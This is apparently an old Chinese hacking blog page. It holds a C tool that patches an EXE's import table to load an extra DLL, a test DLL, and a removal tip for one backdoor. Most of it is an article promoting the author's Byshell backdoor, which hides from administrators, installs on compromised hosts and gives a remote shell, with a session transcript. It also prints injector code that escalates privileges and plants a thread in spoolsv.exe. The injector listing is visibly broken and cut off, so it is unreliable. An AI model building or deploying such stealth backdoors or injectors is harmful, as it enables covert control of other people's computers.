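    dwImportRva = pNTHeader->OptionalHeader.DataDirectory
                      [IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    pSection = GetEnclosingSectionHeader(dwImportRva, pNTHeader);
    if (!pSection)
    {
        fprintf(stderr, "No Import Table..\n");
        return -1;
    }

    Offset = (int)(pSection->VirtualAddress - pSection->PointerToRawData);

    // First IMAGE_IMPORT_DESCRIPTOR inside the mapping.
    pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)(dwImportRva - Offset + dwBase);

    //
    // Count the existing descriptors. The table ends at an all-zero entry;
    // the original test (TimeDateStamp and Name both 0) is kept.
    //
    for (;;)
    {
        if ((pImportDesc->TimeDateStamp == 0) && (pImportDesc->Name == 0))
            break;
        // A descriptor with neither thunk array cannot be valid.
        if (pImportDesc->Characteristics == 0 && pImportDesc->FirstThunk == 0)
        {
            fprintf(stderr, "Malformed import descriptor %d\n", nImportDllCount);
            return -1;
        }
        nImportDllCount++;
        pImportDesc++;
    }
    pImportDesc -= nImportDllCount;   // back to the first descriptor for the copy below

    //
    // End of the section's used raw data: everything new goes after it.
    //
    dwEndOfRawDataAddr = pSection->PointerToRawData + pSection->Misc.VirtualSize;

    nDllNameLen = (int)sizeof(szDll);    // includes the terminating '\0'
    nFuncNameLen = (int)sizeof(szFunc);  // includes the terminating '\0'
    nTotal = nDllNameLen + (int)sizeof(WORD) + nFuncNameLen;

    //
    // Bytes to append: names + hint, thunk + thunk terminator (8), and the
    // descriptor array holding the new entry, the originals and the zero
    // terminator (nImportDllCount + 2 entries).
    //
    nTotalLen = nTotal + 8 + (int)dwDescSize * (nImportDllCount + 2);
    printf("TotalLen: %d byte(s)\n", nTotalLen);

    //
    // The slack between VirtualSize and the file-aligned SizeOfRawData is
    // the only space we may fill. Checked before allocating so that the
    // failure path has nothing to free.
    //
    if (pSection->Misc.VirtualSize + (DWORD)nTotalLen > pSection->SizeOfRawData)
    {
        fprintf(stderr, "No enough space!\n");
        return -1;
    }

    pImportDescVector = (PIMAGE_IMPORT_DESCRIPTOR)HeapAlloc(
        GetProcessHeap(), HEAP_ZERO_MEMORY, dwDescSize * (nImportDllCount + 2));
    if (pImportDescVector == NULL)
    {
        fprintf(stderr, "HeapAlloc() failed. --err: %lu\n", GetLastError());
        return -1;
    }
    // Slot 0 takes the new descriptor, slots 1..n the originals; slot n+1
    // stays zero (HEAP_ZERO_MEMORY) and terminates the table.
    CopyMemory(pImportDescVector + 1, pImportDesc, dwDescSize * nImportDllCount);

    //
    // The descriptor for test.dll.
    //
    Add_ImportDesc.Characteristics = dwEndOfRawDataAddr + nTotal + Offset;  // OriginalFirstThunk: RVA of the thunk
    Add_ImportDesc.TimeDateStamp = 0;            // 0 = not bound. The first version wrote -1, which
                                                 // marks a descriptor bound through the bound-import
                                                 // directory; no such directory is written here.
    Add_ImportDesc.ForwarderChain = (DWORD)-1;   // -1 = no forwarders
    Add_ImportDesc.Name = dwEndOfRawDataAddr + Offset;        // RVA of the DLL name
    Add_ImportDesc.FirstThunk = Add_ImportDesc.Characteristics; // the IAT shares the single thunk
    CopyMemory(pImportDescVector, &Add_ImportDesc, dwDescSize);

    //
    // 1. IMAGE_DIRECTORY_ENTRY_IMPORT.VirtualAddress -> RVA of the new
    //    descriptor array, which follows the names, hint, thunk and terminator.
    //
    dwBuffer = dwEndOfRawDataAddr + Offset + nTotal + 8;
    lDistanceToMove = (long)&(pNTHeader->OptionalHeader.DataDirectory
                              [IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) - dwBase;
    printf("OrigEntryImport: %lx\n", dwImportRva);
    printf("NewEntryImport: %lx\n", dwBuffer);
    if (SeekTo(hFile, lDistanceToMove, "ENTRY_IMPORT") ||
        WriteChecked(hFile, &dwBuffer, 4, "ENTRY_IMPORT"))
        goto cleanup;

    //
    // 2. IMAGE_DIRECTORY_ENTRY_IMPORT.Size follows VirtualAddress in
    //    IMAGE_DATA_DIRECTORY, so the file pointer is already in place.
    //    The loader walks to the zero descriptor, but record the exact size.
    //
    dwBuffer = dwDescSize * (nImportDllCount + 2);
    if (WriteChecked(hFile, &dwBuffer, 4, "Entry_import.size"))
        goto cleanup;

    //
    // 3. Grow the section's VirtualSize so the appended bytes are mapped.
    //
    lDistanceToMove = (long)&(pSection->Misc.VirtualSize) - dwBase;
    dwBuffer = pSection->Misc.VirtualSize + nTotalLen;
    if (SeekTo(hFile, lDistanceToMove, "Misc.VirtualSize") ||
        WriteChecked(hFile, &dwBuffer, 4, "Misc.VirtualSize"))
        goto cleanup;

    //
    // 4. Append the new data at the end of the section's used raw data.
    //
    if (SeekTo(hFile, (long)dwEndOfRawDataAddr, "EndOfRawData") ||
        WriteChecked(hFile, szDll, nDllNameLen, "DllName") ||
        WriteChecked(hFile, &Hint, sizeof(WORD), "Hint") ||
        WriteChecked(hFile, szFunc, nFuncNameLen, "FuncName"))
        goto cleanup;

    // Thunk: RVA of the IMAGE_IMPORT_BY_NAME (hint + name) written just above.
    dwBuffer = dwEndOfRawDataAddr + nDllNameLen + Offset;
    if (WriteChecked(hFile, &dwBuffer, 4, "Thunk"))
        goto cleanup;

    // Thunk-array terminator, then the descriptor array including its terminator.
    dwBuffer = 0;
    if (WriteChecked(hFile, &dwBuffer, 4, "ThunkEnd") ||
        WriteChecked(hFile, pImportDescVector, dwDescSize * (nImportDllCount + 2),
                     "ImportDescriptors"))
        goto cleanup;

    nRet = 0;

cleanup:
    HeapFree(GetProcessHeap(), 0, pImportDescVector);
    return nRet;
}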

下面是测试用的DLL代码.
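// The header name was lost from the listing (the angle brackets were eaten by
// the page markup); everything below needs <windows.h>.
#include <windows.h>
#pragma comment(lib, "user32")

// Export with C linkage so the function appears in the export table under its
// plain name "Startup" (no C++ mangling) - the exact string AddImportDll
// writes into the patched executable's import table.
// NOTE(review): identifiers starting with a double underscore are reserved for
// the implementation; the macro name is kept because Startup() below uses it.
#define __DLL_EXPORT extern "C" __declspec(dllexport)

__DLL_EXPORT void Startup();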

// DLL entry point. On DLL_PROCESS_ATTACH it shows a message box so that the
// injected import can be seen to load; the thread attach/detach and process
// detach notifications do nothing. Always returns TRUE.
// NOTE(review): MessageBox (user32) is called while the loader lock is held,
// which the DllMain guidelines advise against; fine for a demo DLL only.
BOOL
WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
    (void)hinstDLL;
    (void)lpvReserved;

    if (fdwReason == DLL_PROCESS_ATTACH)
        MessageBox(NULL, "Hook Ok!", "info", MB_OK);

    // DLL_THREAD_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_DETACH: nothing to do.
    return TRUE;
}


// Exported function that the patched executable imports by name. It only
// shows a message box; the injector shown above merely adds the import, and
// nothing in the shown code calls Startup() - the DllMain message box is what
// fires at load time.
__DLL_EXPORT void
Startup()
{
    const char *caption = "info";

    MessageBox(NULL, "Startup()", caption, MB_OK);
}

这段代码还有些问题,一些EXE文件并不能保证在修改后正确的运行,如何解决?如果您对此感兴趣,请动手来寻找答案吧.
说点题外话,如果您的系统不幸中了黑客之门,并且您的手头没有windows安装光盘或者DLLCACHE中也没有备份的话.首先要找到被修改的exe文件,之后建立一个备份用Stud_PE打开这个备份,在"头部"标签中"更多"下拉菜单中选IMAGE_DIR_ENTRY_DEBUG,这时,下拉菜单下面的两个对话框中会有两个值,这两个值就是黑客之门修改之前原始的导入表的位置.用这两个值替换"导入表"后面的内容,之后选"保存到文件",退出Stud_PE用inuse替换,重启之后删除后门dll便可以了.

使用工具:
hkdoordll.dll(1.1版本)
Stud_PE 2.0.0.1
dumpbin.exe

参考资料:
《Windows 95 System programming SECRETS (中译本)》

By CDrea
http://www.safechina.net
CDrea@safechina.net

发表于 @ 2006年04月13日 11:15 PM | 评论 (0)

[Byshell后门]无进程无DLL无硬盘文件无启动项
现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真正的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很正常了。

  一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新增服务,当然更不能直接写开始菜单的启动项;不能如同无视管理员或者防火墙一般明目张胆地打开陌生端口;像Bits.dll那样等待连接时无端口,连接时开端口的程序,在端口检查时只有30%的几率能逃脱。另外后门最好能隐藏自己生成的文件,或者避免感染一些管理员经常检查完整性的系统文件。前三点没有做到的后门程序不是一个“比较高级”的后门程序,当然在使用的时候也就没有稳定性、保密性可言了。
  按照我的分类,现在常见的后门大概可以分成三个“级别”:
  ★应用级。如WinShell、Radmin、冰河等,它们基本没有采取别的方法来隐藏自己,只是一个普通的能够实现远程控制的应用程序而已。
  ★系统级。多多少少采用了一些Ring3下隐藏行踪的编程技术,用得少的比如Bits.dll,Portless,用得多的比如Hxdef。

小提示:Hxdef虽然有一个驱动,但是它对系统的Hook全都是Ring3的,因此大家倾向于称它为系统级而非内核级后门。

  ★内核级,后门主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。但是公布的完整的内核级后门数量不多,兼容性也不尽如人意。这个话题在Phrack和Rootkit.com上有很多有价值的讨论和成果公布。
  我在自己写的系统级后门Byshell v0.64中尽力做到以上的要求,然而由于个人能力有限,功能的实现不够全面、稳定,希望大家能给我提好的意见或者替我升级版本。在这篇文章中我将和大家讨论这个开源后门的设计、实现,当然还有实际的应用举例,希望高手不要扔板砖,大家一起讨论。

应用举例
这是一个实现了无进程、无DLL、无硬盘文件、无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量地借鉴和学习了农民Cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。我允许此软件及其源代码自由传播,但引用时应注明出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,可用作学习和私人用途。
Byshell 0.64支持的命令列表如下:cmd,shell,endshell,chpass,byver,sysinfo,pslist,pskill,modlist,get,put,reboot,dettach,popmsg,SYN,queryDOS,endDOS,refresh等,具体用法请查看说明书。

小提示:说明书上遗漏了refresh命令,它的作用是清除死掉的连接,并且给你机会重新连接,也可以在你换了一个IP以后,清除原来的连接(否则不能正常连接)。

安装后门时只要把Ntboot.exe和Ntboot.dll上传到肉鸡同一目录并且执行“ntboot.exe –install”即可,安装完成后可手动删除Ntboot.exe和Ntboot.dll,连接的时候用By064cli.exe。注意Byshell v0.64不支持本机对本机测试,v 0.63可以。现在我用v 0.63演示一下使用的效果:
1.连接:
please input the server ip address
127.0.0.1
127.0.0.1 will be connected
input the password(the default one is ’by’)
by
#cmddir c:
驱动器 C 中的卷没有标签。
卷的序列号是 CCB2-D751

c: 的目录

2005-01-29 14:22     <DIR>       Documents and Settings
2004-10-01 19:24     <DIR>       Inetpub
2004-11-17 20:56     <DIR>       Intel
2004-10-30 14:18           24,576 isapilog.dll
2004-11-11 00:55           24,576 magic_asp.dll
2005-02-07 21:47     <DIR>       My Music
2004-12-21 00:05             124 Operate.ini
2005-01-18 22:38     <DIR>       Program Files
2005-02-07 23:31     <DIR>       ubackup
2005-02-02 17:54     <DIR>       WINNT
          3 个文件       49,276 字节
          7 个目录   124,207,104 可用字节
2.获得并结束Shell:
#shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:WINNTsystem32>cd..
cd..

C:WINNT>cd..
cd..

C:>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 CCB2-D751

C: 的目录

……省略
          3 个文件       49,276 字节
          7 个目录   124,207,104 可用字节

C:>endshell
shell terminated
#byver
ByShell server version 0.63
Released Dec 19,2004 Copyleft@ "by" co.ltd.
3.进程列举与Kill。这里有BUG,排列不整齐。
#pslist
process:
pid   filename     num_thread     parentpid
8     System 43     0
184   smss.exe     6     8
208   csrss.exe     11     184
232   winlogon.exe   19     184
260   services.exe   31     232
272   lsass.exe     17     232
456   svchost.exe   11     260
488   SPOOLSV.EXE   14     260
524   msdtc.exe     21     260
636   svchost.exe   18     260
656   llssrv.exe     9     260
688   sqlservr.exe   28     260
776   winmgmt.exe   3     260
812   dfssvc.exe     2     260
832   inetinfo.exe   29     260
856   mssearch.exe   6     260
1224   svchost.exe   11     260
1176   explorer.exe   19     1172
1356   igfxtray.exe   2     1176
1404   PFWMain.exe   4     1176
1412   SOUNDMAN.EXE   2     1176
1428   realsched.exe   4     1176
1436   internat.exe   1     1176
1444   sqlmangr.exe   3     1176
1280   BitComet.exe   9     1176
328   notepad.exe   2     1176
1196   MDM.EXE 5     456
1512   conime.exe     1     1088
1520   cmd.exe 1     488
1504   by063cli.exe   1     1176
#pskill1428
OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
#modlist1520

mods of 1520:
module_id     module_name   module_path
1     ntdll.dll     C:WINNTSystem32ntdll.dll
1     KERNEL32.dll   C:WINNTsystem32KERNEL32.dll
1     USER32.dll     C:WINNTsystem32USER32.dll
1     GDI32.DLL     C:WINNTsystem32GDI32.DLL
1     ADVAPI32.dll   C:WINNTsystem32ADVAPI32.dll
1     RPCRT4.DLL     C:WINNTsystem32RPCRT4.DLL
1     MSVCRT.dll     C:WINNTsystem32MSVCRT.dll
1     IMM32.DLL     C:WINNTSystem32IMM32.DLL
#
好了,就介绍这三个最普通的功能吧。其实在很多场合,这三个功能是最基本的功能,也是最难确保稳定性的三个问题疑难,不过这个后门最突出的特色应该是无进程、无DLL、无硬盘文件、无启动项的实现,在实际的使用过程中相信大家会发现它的优点,下面我们从设计和编程的角度来看这些功能是如何实现的。

设计&编程
  在这一部分中我不列举完整的代码,因为它太长了,我将引用关键代码来说明编写思路。
首先是怎样隐藏自身的进程?一个普遍采用的方法就是远程线程注射。但它最大的问题是注射代码到了远程进程的地址空间后,由于地址空间的变化,依赖于原来地址空间的所有直接寻址指令需要重定位。这点对汇编老手来说是很容易理解的,对高级语言程序编写者来说这意味着所有显式和非显式的全局变量(如API地址和字符串)都需要进行手工重定位。
相比于病毒程序,我们很幸福,因为我们的的注射器可以同时向远程进程注射一个“全局变量块”,再把这个块的地址传送到远程函数,然后在远程函数中使用这个块来替代直接寻址的全局变量,从而免于编写完全“自身可重定位”的代码。后者被认为是非常烦琐并且几乎无法用高级语言实现的。但即使是这样,编写可以重定位的代码复杂度仍然比较大,写功能模块比较多的后门程序将会非常累。农民前辈的Cmdbind2实现了完全手工重定位的注射后门,我们看他的源代码可以发现他仅仅在实现最普通的Bind Shell上就花费了很多代码,像ByShell v0.64这样的功能复杂的后门,如果也这样实现功能的话,无疑是难以想象的。
  取代直接编写可重定位代码的普遍方法是在注射进入远程进程的函数中加载一个DLL,这样的话系统将为你做重定位工作,后门主要功能实现在DLL中。例如以前的黑防中,单长虹介绍过这种方法。这种方法也有一个小弊端就是管理员在审核被你注射的进程时会发现一个不明的DLL从而导致后门暴露。农民前辈提出了一种思路,先加载DLL,然后把这一块内存全部拷贝到其它地方,卸载DLL,再申请与原来加载DLL相同的地址空间,把其它地方“寄存”的DLL代码拷贝回这个空间。然后直接调用这个DLL,就解决了所有的重定位问题,还不会在被注射进程的加载模块列表里出现我们的DLL。农民前辈并没有实现他的想法为代码,一会给出我用这种方法实现的主要代码。
  进行比较讨论时我们也来讨论其它的系统级隐藏进程方法。Bingle采用替代Svchost启动的DLL服务的方法来加载后门,ZXshell也使用了这种方法。这种方法的主要问题是不稳定,必须改写注册表敏感键值并在Svchost.exe的加载模块中出现不明模块。当然如果用和原来同名的木马DLL来替代原来的DLL可以避免以上问题,但是又会遇到新的问题,就是怎样绕过Windows的系统文件保护和管理员例行的系统文件完整性检查。
  Hxdef统一采用Hook ring3 API(主要是Ntdll.dll的NativeAPI)的方法完成自身各个方面的隐藏。这种方法对于一般的Ring3检查效果很好,并且可以部分实现端口复用。它的主要问题有Ring3下Hook的手段不多,而且比较“兴师动众”(Hxdef向系统中所有进程注射木马数据),效果还不是很好,极易被Ring0的RootKit Detector发现,如ICESWORD。最后还有就是编程烦琐。
  我选用了注射远程进程Spoolsv.exe,假脱机打印服务的方法,并且在注射到远程的函数中加载然后卸载了一个木马DLL——Ntboot.dll,注射器则是Ntboot.exe。请看代码:

// Injector: find the target process (spoolsv.exe), enable SeDebugPrivilege,
// copy a table of kernel32 function pointers (injapistr) and the body of
// injfunc() into the target, then start injfunc there as a remote thread with
// the table's address as its argument.
//
// NOTE(review): in this copy of the listing the body of the Process32 loop
// is missing - the for(...) header is followed directly by a lone closing
// brace - so `pid` is never assigned in the text as shown and the braces do
// not balance. None of the Win32 return values are checked (`ret` is assigned
// but never tested), hToken is never closed, and the 20000-byte copy assumes
// injfunc's code is contiguous and no longer than that.
void injcode(){HANDLE prohandle;// handle of the process being injected into
DWORD pid=0;// PID of the target process
int ret; // scratch result variable

// Find the target PID through a ToolHelp32 process snapshot
Sleep(1000);
HANDLE snapshot;
snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
char injexe[]="spoolsv.exe";// name of the target process; change as needed
for(Process32First(snapshot,&processsnap);
Process32Next(snapshot,&processsnap);)
// (loop body lost in this copy of the listing - see the note above)
}
CloseHandle(snapshot);// PID obtained
// Enable SE_DEBUG_NAME so OpenProcess(PROCESS_ALL_ACCESS) succeeds on a service process
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
// Now inject
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
DWORD WINAPI injfunc(LPVOID);// injfunc is the function copied into the target; it needs manual relocation
// Resolve the API addresses injfunc needs and store them in the "global
// variable block" to be injected; injapistr is a global struct holding that
// block's contents
HMODULE hModule;
LPVOID paramaddr;// address of the global-variable block inside the target
hModule=LoadLibrary("kernel32.dll");
injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
// Allocate the "global variable block" in the target process and write the
// API addresses into it (data only, yet mapped PAGE_EXECUTE_READWRITE)
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
// Copy the code of injfunc (a fixed 20000 bytes) into the target
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
// Start the remote thread at the copied code, passing the block's address
CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
CloseHandle(prohandle);
return;
}
//注射到远程的函数,负责完成加载和卸载功能复杂的木马DLL的艰巨任务
DWORD WINAPI injfunc(LPVOID paramaddr){
//paramaddr,全局变量块首址。所有静态全局变量都需要重定位(直接寻址的),而动态分配(堆,Virtualalloc)和栈变量不需要,因为他们使用间接寻址。其实字符串也可以在刚才写进全局变量块,但是字符串不多,这里直接用ASM搞定。
char ntboot[16];
char msgbox[16];//变量名字起错了,应该是DLL的后门主函数名。汗,希望不要误导大家。
INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;
__asm{
mov ntboot,’n’
mov ntboot+1,’t’
mov ntboot+2,’b’
mov ntboot+3,’o’
mov ntboot+4,’o’
mov ntboot+5,’t’
mov ntboot+6,’.’
mov ntboot+7,’d’
mov ntboot+8,’l’
mov ntboot+9,’l’
mov ntboot+10,0
mov msgbox,’C’
mov msgbox+1,’m’
mov msgbox+2,’d’
mov msgbox+3,’S’
mov msgbox+4,’e’
mov msgbox+5,’r’
mov msgbox+6,’v’
mov msgbox+7,’i’
mov msgbo